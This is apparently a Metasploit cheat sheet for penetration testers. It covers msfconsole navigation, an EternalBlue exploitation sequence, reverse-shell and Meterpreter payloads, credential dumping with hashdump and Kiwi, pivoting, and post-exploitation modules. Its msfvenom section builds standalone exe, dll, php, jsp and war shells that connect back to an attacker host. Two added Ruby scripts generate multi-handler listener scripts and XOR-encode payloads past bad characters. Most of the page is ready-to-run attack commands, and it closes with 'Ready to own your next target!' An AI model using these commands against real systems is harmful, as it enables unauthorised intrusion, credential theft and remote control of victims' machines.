Metasploit Cheat Sheet
Complete Exploitation Framework Reference
2000+ exploits • Payloads • Post-exploitation • Msfconsole commands
What is Metasploit?
Metasploit Framework is the world's most widely used penetration testing framework. Originally developed by H.D. Moore in 2003, it's now maintained by Rapid7. The framework includes thousands of exploits, hundreds of payloads, and extensive post-exploitation capabilities.
Metasploit Framework comes pre-installed on Kali Linux and is free and open source; Rapid7 also sells a commercial edition, Metasploit Pro (metasploit.com).
📦 Installation & Starting
Kali Linux (Pre-installed)
msfconsole
Start with Database
sudo msfdb init
msfconsole
Start Quietly (No Banner)
msfconsole -q
Execute Commands on Start
msfconsole -x "use exploit/..."
🧭 Basic Navigation Commands
| Command | Description |
|---|---|
| help | Show all available commands |
| help <command> | Get help for specific command |
| exit / quit | Exit msfconsole |
| back | Go back from current module |
| banner | Display random banner |
| version | Show framework version |
| history | Show command history |
| connect <ip> <port> | Connect to host (like netcat) |
🔍 Searching Modules
```
# Basic search
search <keyword>

# Search by type
search type:exploit <keyword>
search type:auxiliary <keyword>
search type:post <keyword>
search type:payload <keyword>

# Search by platform
search platform:windows <keyword>
search platform:linux <keyword>

# Search by CVE
search cve:2021-44228

# Search by author
search author:hdm

# Combined search
search type:exploit platform:windows smb

# Search by rank (excellent, great, good, ...)
search rank:excellent type:exploit
```
Module Types
| Type | Description |
|---|---|
| exploit | Exploit vulnerabilities |
| auxiliary | Scanners, fuzzers, etc. |
| post | Post-exploitation modules |
| payload | Shellcode and payloads |
| encoder | Payload encoding |
| nop | NOP generators |
| evasion | AV evasion modules |
⚙️ Using Modules
| Command | Description |
|---|---|
| use <module> | Select a module to use |
| info | Show module information |
| options / show options | Display module options |
| show advanced | Show advanced options |
| set <option> <value> | Set option value |
| setg <option> <value> | Set global option (persists) |
| unset <option> | Clear option value |
| show payloads | List compatible payloads |
| show targets | List exploit targets |
| check | Check if target is vulnerable |
| run / exploit | Execute the module |
| exploit -j | Run as background job |
📋 Example: Exploiting EternalBlue
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker>
exploit
```
💣 Payloads
Payload Types
| Type | Description |
|---|---|
| singles | Self-contained payloads (no stager needed) |
| stagers | Small payloads that download the stage |
| stages | Downloaded by stagers (e.g., meterpreter) |
Common Payloads
```
# Windows Meterpreter (staged)
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp

# Windows Meterpreter (stageless)
windows/meterpreter_reverse_tcp
windows/x64/meterpreter_reverse_tcp

# Linux Meterpreter
linux/x86/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp

# Simple shells
windows/shell/reverse_tcp
linux/x86/shell/reverse_tcp

# HTTPS payloads (TLS-wrapped; outbound 443 is usually allowed through egress filtering)
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
```
💡 Staged vs Stageless
Staged (/): a small stager connects back first and pulls the rest of Meterpreter (the stage) from the handler over that connection. Stageless (_): the whole payload ships in one blob; larger, but nothing has to be fetched after the connection is made. Use stageless when a proxy, IDS or unreliable link may break the stage download. In either case the handler's PAYLOAD must be the exact name (staged or stageless, same arch) used to generate the payload, or the session will not come up.
🎮 Meterpreter Commands
Core Commands
| Command | Description |
|---|---|
| help | Show all commands |
| background | Background current session |
| exit | Terminate meterpreter session |
| sysinfo | System information |
| getuid | Current user ID |
| getpid | Current process ID |
| ps | List running processes |
| migrate <pid> | Migrate to another process |
| shell | Drop to system shell |
File System Commands
| Command | Description |
|---|---|
| pwd | Print working directory |
| cd <path> | Change directory |
| ls | List files |
| cat <file> | Read file contents |
| download <file> | Download file to attacker |
| upload <file> | Upload file to target |
| edit <file> | Edit file with vim |
| search -f <pattern> | Search for files |
Privilege Escalation
| Command | Description |
|---|---|
| getsystem | Attempt to get SYSTEM privileges |
| getprivs | List available privileges |
| hashdump | Dump SAM password hashes (requires SYSTEM) |
| load kiwi | Load the Kiwi (Mimikatz) extension |
| creds_all | Dump all credentials (kiwi) |
Network & Pivoting
| Command | Description |
|---|---|
| ipconfig / ifconfig | Show network configuration |
| arp | Display ARP cache |
| route | View routing table |
| portfwd add -l <lport> -p <rport> -r <host> | Port forwarding |
| run autoroute -s <subnet> | Add a route through this session for pivoting (equivalent in msfconsole: route add <subnet> <netmask> <session id>) |
📡 Handlers & Listeners
```
# Set up handler for a reverse payload
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker>
set LPORT 4444
run

# Run as background job
exploit -j

# One-liner handler
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker>; set LPORT 4444; run"
```
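The staged/stageless note above and the handler setup share one practical check: the handler's PAYLOAD must be the exact name the payload was built with. The following Ruby is an added example written for this cheat sheet, not code from the original page or from the Metasploit project. It reads a payload name by the naming convention (stage/transport is staged, stage_transport is stageless), converts between the two forms, and writes a multi/handler resource script for that name. The stage list, the resource-script layout, the default port 4444 and the IPAddr check are this example's own choices.

```ruby
# Added example for this cheat sheet; not code from the page or from the
# Metasploit project. Parses a payload name by its naming convention,
# converts staged <-> stageless, and emits a multi/handler resource script
# whose PAYLOAD matches the name exactly. STAGES, the rc layout, the default
# port and the address check are assumptions made for this example.
require 'ipaddr'

# Stage names that sit between the platform/arch prefix and the transport.
STAGES = %w[meterpreter shell vncinject dllinject upexec patchupmeterpreter].freeze
TRANSPORT_RE = /\A(reverse|bind)_[a-z0-9_]+\z/

PayloadName = Struct.new(:prefix, :stage, :transport, :kind) do
  def staged
    "#{prefix}/#{stage}/#{transport}"
  end

  def stageless
    "#{prefix}/#{stage}_#{transport}"
  end
end

# Classify a name as :staged, :stageless or :single (no recognised stage).
def parse_payload(name)
  segs = name.split('/')
  last = segs[-1]
  if segs.size >= 3 && STAGES.include?(segs[-2]) && last.match?(TRANSPORT_RE)
    return PayloadName.new(segs[0..-3].join('/'), segs[-2], last, :staged)
  end
  STAGES.each do |stage|
    next unless last.start_with?("#{stage}_")
    transport = last.delete_prefix("#{stage}_")
    return PayloadName.new(segs[0..-2].join('/'), stage, transport, :stageless) if transport.match?(TRANSPORT_RE)
  end
  PayloadName.new(segs[0..-2].join('/'), nil, last, :single)
end

# Resource script text; run it with: msfconsole -q -r handler.rc
# ExitOnSession false and exploit -j -z keep the listener up for many callbacks.
def handler_rc(payload, lhost, lport = 4444)
  IPAddr.new(lhost) # raises IPAddr::InvalidAddressError on a typo or an unreplaced <attacker>
  raise ArgumentError, "LPORT out of range: #{lport}" unless (1..65_535).cover?(lport)
  info = parse_payload(payload)
  unless info.transport.include?('reverse_') || info.transport.include?('bind_')
    raise ArgumentError, "#{payload} has no reverse/bind transport"
  end
  [
    'use exploit/multi/handler',
    "set PAYLOAD #{payload}",
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'set ExitOnSession false',
    'exploit -j -z'
  ].join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  %w[windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter_reverse_https
     linux/x86/shell_reverse_tcp java/jsp_shell_reverse_tcp].each do |n|
    puts "#{n.ljust(40)} -> #{parse_payload(n).kind}"
  end
  puts handler_rc('windows/x64/meterpreter_reverse_https', '10.0.0.5', 443)
end
```

Save the returned text as handler.rc and start it with `msfconsole -q -r handler.rc`. `set ExitOnSession false` with `exploit -j -z` is what makes one handler serve many callbacks; without it the job exits after the first session. The address check exists because a handler bound to a mistyped LHOST fails silently from the target's point of view.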
🔗 Session Management
| Command | Description |
|---|---|
| sessions | List all active sessions |
| sessions -i <id> | Interact with session |
| sessions -k <id> | Kill session |
| sessions -u <id> | Upgrade shell to meterpreter |
| sessions -c <cmd> | Run command on all sessions |
⚙️ Jobs Management
| Command | Description |
|---|---|
| jobs | List running jobs |
| jobs -k <id> | Kill a job |
| jobs -K | Kill all jobs |
🔧 Msfvenom Payload Generation
Msfvenom is used to generate standalone payloads outside of msfconsole.
```
# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f dll -o shell.dll

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f elf -o shell.elf

# PHP shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.php

# Python shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.py

# JSP shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.jsp

# ASP shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f asp -o shell.asp

# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f war -o shell.war

# With an encoder (for bad-character avoidance; encoding alone does little against modern AV/EDR)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -e x64/xor_dynamic -i 5 -f exe -o shell.exe
```
Msfvenom Options
| Option | Description |
|---|---|
| -p | Payload to use |
| -f | Output format (exe, dll, elf, raw, etc.) |
| -o | Output file |
| -e | Encoder to use |
| -i | Encoding iterations |
| -b | Bad characters to avoid (e.g. -b '\x00\x0a') |
| -l payloads | List all payloads |
| -l formats | List output formats |
| -l encoders | List encoders |
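What `-b` and `-e` actually do is easier to see in a few lines of code than in the option table. The Ruby below is an added example written for this cheat sheet, not code from the page or from Metasploit's encoders: a minimal single-byte XOR encoder that searches for a key such that neither the key nor any encoded byte is a bad character, then verifies the result and round-trips it. Real encoders such as x64/xor_dynamic also prepend a decoder stub and use longer keys; only the key search and the check are shown. BADCHARS and SAMPLE are constructed for the example; SAMPLE is not a working payload.

```ruby
# Added example for this cheat sheet; not code from the page or from the
# Metasploit project. A minimal single-byte XOR encoder that mirrors what
# msfvenom -b/-e do conceptually: pick a key so that neither the key nor any
# encoded byte is a bad character, then verify. Real encoders also emit a
# decoder stub; that part is omitted. BADCHARS and SAMPLE are constructed.

# Bad characters that must not appear in the final bytes (constructed list:
# NUL, LF, CR, space, the usual suspects for string-copy and HTTP parsers).
BADCHARS = "\x00\x0a\x0d\x20".b

# Constructed bytes containing both 0x00 and 0x0a, plus 0x01..0x03 and 0x0e so
# that keys 1..4 are rejected and the search is visible. Not a real payload.
SAMPLE = [0x31, 0xc0, 0x01, 0x0b, 0x0c, 0x2f, 0x73, 0x68,
          0x00, 0x0a, 0xcd, 0x80, 0x0e, 0x03, 0x02].pack('C*')

# Bad characters actually present in +bytes+, in order of first appearance
# (empty array when the blob is clean).
def bad_chars_in(bytes, badchars = BADCHARS)
  bad = badchars.bytes
  bytes.bytes.select { |b| bad.include?(b) }.uniq
end

# First key in 1..255 such that the key itself and every (b ^ key) avoid the
# bad characters; nil when no single-byte key works (a longer/rolling key is
# then needed, which is what the real encoders fall back to).
def find_xor_key(bytes, badchars = BADCHARS)
  bad = badchars.bytes
  (1..255).find do |key|
    !bad.include?(key) && bytes.bytes.none? { |b| bad.include?(b ^ key) }
  end
end

# Returns [key, encoded_bytes]; raises when no key avoids the bad characters.
def xor_encode(bytes, badchars = BADCHARS)
  key = find_xor_key(bytes, badchars)
  raise ArgumentError, 'no single-byte XOR key avoids the bad characters' unless key
  [key, bytes.bytes.map { |b| b ^ key }.pack('C*')]
end

# XOR is its own inverse; this is what the decoder stub does at run time.
def xor_decode(encoded, key)
  encoded.bytes.map { |b| b ^ key }.pack('C*')
end

if __FILE__ == $PROGRAM_NAME
  key, enc = xor_encode(SAMPLE)
  printf("key 0x%02x, bad chars before: %s, after: %s\n",
         key, bad_chars_in(SAMPLE).inspect, bad_chars_in(enc).inspect)
  puts "round trip ok: #{xor_decode(enc, key) == SAMPLE}"
end
```

Two things follow from this. `-i N` re-encodes the previous pass's output N times, each pass adding its own decoder stub, which is why the binary grows and why the result is no harder for a behaviour-based AV to recognise once it runs. And when msfvenom reports that it could not find a valid encoding, it hit the same dead end as `find_xor_key` returning nil: the bad-character set is too large for that encoder's key space, so try a different encoder or reduce the set.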
🗄️ Database Commands
```
# Initialize database
sudo msfdb init

# Check database status
db_status

# Create workspace
workspace -a <name>

# Switch workspace
workspace <name>

# Import nmap scan
db_import nmap_scan.xml

# Run nmap from msfconsole
db_nmap -sV -O <target>

# View hosts
hosts

# View services
services

# View vulnerabilities
vulns

# View credentials
creds

# View loot
loot
```
🎯 Useful Post-Exploitation Modules
```
# Windows
post/windows/gather/hashdump
post/windows/gather/credentials/credential_collector
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_applications
post/windows/manage/enable_rdp

# Linux
post/linux/gather/hashdump
post/linux/gather/enum_users_history
post/linux/gather/enum_system

# Multi-platform
post/multi/gather/ssh_creds
post/multi/recon/local_exploit_suggester
```
⚔️ Metasploit Cheat Sheet Complete!
You now have a reference for the Metasploit Framework covering enumeration, exploitation and post-exploitation, the commands penetration testers use day to day.
Ready to own your next target!